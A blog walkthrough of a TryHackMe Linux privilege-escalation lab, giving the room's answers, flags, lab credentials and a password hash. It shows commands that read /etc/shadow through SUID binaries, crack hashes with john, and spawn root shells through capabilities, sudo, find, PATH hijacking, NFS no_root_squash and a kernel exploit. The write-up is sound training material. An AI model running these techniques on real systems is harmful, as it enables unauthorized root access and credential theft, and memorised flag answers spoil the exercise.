Tryhackme - Linux Privilege Escalation

Tryhackme – Linux Privilege Escalation

In this walk through, we will be going through the Linux Privilege Escalation from Tryhackme. This room is rated as Medium on the platform and teaches fundamentals of Linux Privilege Escalation from enumeration to exploitation covering 8 different privilege escalation techniques. So, let’s get started without any delay.

Tryhackme - Linux Privilege Escalation

Task 1 – Introduction

Task 1 - Introduction

Task 2 – What is Privilege Escalation?

What does “Linux privilege escalation” mean?

At it’s core, Privilege Escalation usually involves going from a lower permission account to a higher permission one. More technically, it’s the exploitation of a vulnerability, design flaw, or configuration oversight in an operating system or application to gain unauthorized access to resources that are usually restricted from the users.

Task 2 - What is Privilege Escalation?

Task 3 – Enumeration

Question 1 – What is the hostname of the target system?

hostname

hostname

wade7363

Question 2 – What is the Linux kernel version of the target system?

uname -r

uname -r

3.13.0-24-generic

Question 3 – What Linux is this?

cat /etc/issue

cat /etc/issue
Ubuntu 14.04 LTS

Question 4 – What version of the Python language is installed on the system?

python

python
2.7.6

Question 5 – What vulnerability seem to affect the kernel of the target system? (Enter a CVE number)

CVE-2015-1328
CVE-2015-1328 

Task 3 - Enumeration

Task 4 – Automated Enumeration Tools

Task 4 - Automated Enumeration Tools

Task 5 – Privilege Escalation: Kernel Exploits

Question 1 – find and use the appropriate kernel exploit to gain root privileges on the target system.

Done

Link: https://www.exploit-db.com/exploits/37292

CVE-2015-1328

Question 2 – What is the content of the flag1.txt file?

wget 37292.c

gcc 37292.c -o ofs

Flag 1

THM-28392872729920
Task 5 - Privilege Escalation: Kernel Exploits

Task 6 – Privilege Escalation: Sudo

Question 1 – How many programs can the user “karen” run on the target system with sudo rights?

sudo -l
sudo -l

3

Question 2 – What is the content of the flag2.txt file?

Flag 2

THM-402028394

Question 3 – How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

sudo nmap --interactive

Question 4 – What is the hash of frank’s password?

sudo -l

sudo less /etc/shadow

frank
$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1:18796:0:99999:
Task 6 - Privilege Escalation: Sudo

Task 7 – Privilege Escalation: SUID

Question 1 – Which user shares the name of a great comic book writer?

cat /etc/passwd

gerryconway
gerryconway

Question 2 – What is the password of user2?

user 2

LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode

LFILE=/etc/shadow
karen password

unshadow passwd.txt shadow.txt > finalpasswords.txt
john finalpasswords.txt

Password1

Question 3 – What is the content of the flag3.txt file?

LFILE=/home/ubuntu/flag3.txt
base64 "$LFILE" | base64 --decode

Flag 3

THM-3847834

Task 7 - Privilege Escalation: SUID

Task 8 – Privilege Escalation: Capabilities

Question 1 – Complete the task described above on the target system

Done

Question 2 – How many binaries have set capabilities?

getcap -r / 2>/dev/null
6

Question 3 – What other binary can be used through its capabilities?

view

Question 4 – What is the content of the flag4.txt file?

./view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
Flag 4
THM-9349843
Task 8 - Privilege Escalation: Capabilities

Task 9 – Privilege Escalation: Cron Jobs

Question 1 – How many user-defined cron jobs can you see on the target system?

cron jobs
 4

Question 2 – What is the content of the flag5.txt file?

backup.sh

netcat listener

Flag 5

THM-383000283

Question 3 – What is Matt’s password?

unshadow
123456

Task 9 - Privilege Escalation: Cron Jobs

Task 10 – Privilege Escalation: PATH

Question 1 – What is the odd folder you have write access for?

find / -writable 2>/dev/null | grep home | cut -d "/" -f 2,3| sort -u

find / -writable 2>/dev/null | grep home | cut -d "/" -f 2,3 | sort -u home/murdoch

find / -writable 2>/dev/null | grep home | cut -d "/" -f 2,3| sort -u
/home/murdoch
/home/murdoch

Question 2 – Exploit the $PATH vulnerability to read the content of the flag6.txt file.

Done

echo "cat /home/matt/flag6.txt" > thm

echo $PATH

Question 3 – What is the content of the flag6.txt file?

Flag 6
THM-736628929

Task 10 - Privilege Escalation: PATH

Task 11 – Privilege Escalation: NFS

Question 1 – How many mountable shares can you identify on the target system?

cat /etc/exports
showmount -e

3

Question 2 – How many shares have the “no_root_squash” option enabled?

3

Question 3 – Gain a root shell on the target system

Done
showmount -e 10.10.223.142
showmount -e
mkdir /tmp/rootshell

mkdir /tmp/rootshell
sudo mount -o rw 10.10.223.142:/home/backup /tmp/rootshell

sudo mount -o
nfs.c
gcc nfs.c -o nfs -w
chmod +s nfs
ls -l nfs
gcc nfs.c -o nfs -w
ls /tmp/test
ls /tmp
user id
root shell

Question 4 – What is the content of the flag7.txt file?

Flag7

THM-89384012
Task 11 - Privilege Escalation: NFS

Task 12 – Capstone Challenge

You have gained SSH access to a large scientific facility. Try to elevate your privileges until you are Root.
We designed this room to help you build a thorough methodology for Linux privilege escalation that will be very useful in exams such as OSCP and your penetration testing engagements.

Leave no privilege escalation vector unexplored, privilege escalation is often more an art than a science.

You can access the target machine over your browser or use the SSH credentials below.

  • Username: leonard
  • Password: Penny123

Priv Esc techniques used:

  • SUID
  • Sudo
SSH login
find / -type f -perm -04000 -ls 2>/dev/null

LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
find / -type f -perm -04000 -ls 2>/dev/null
unshadow

SSH login

find . -name flag1.txt
find . -exec /bin/sh \; -quit 

GTFObins find
sudo -l

Question 1 – What is the content of the flag1.txt file?

THM-42828719920544

Question 2 – What is the content of the flag2.txt file?

THM-168824782390238
Tryhackme - Linux Privilege Escalation

Also Read: Tryhackme – Linux PrivEsc

So that was “Linux Privilege Escalation” for you. In this room, we covered a variety of Linux privilege escalation techniques which we can use once we landed in a linux machine. Well, the best thing on any machine is to be root and today we have learned on how we can get to that point. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top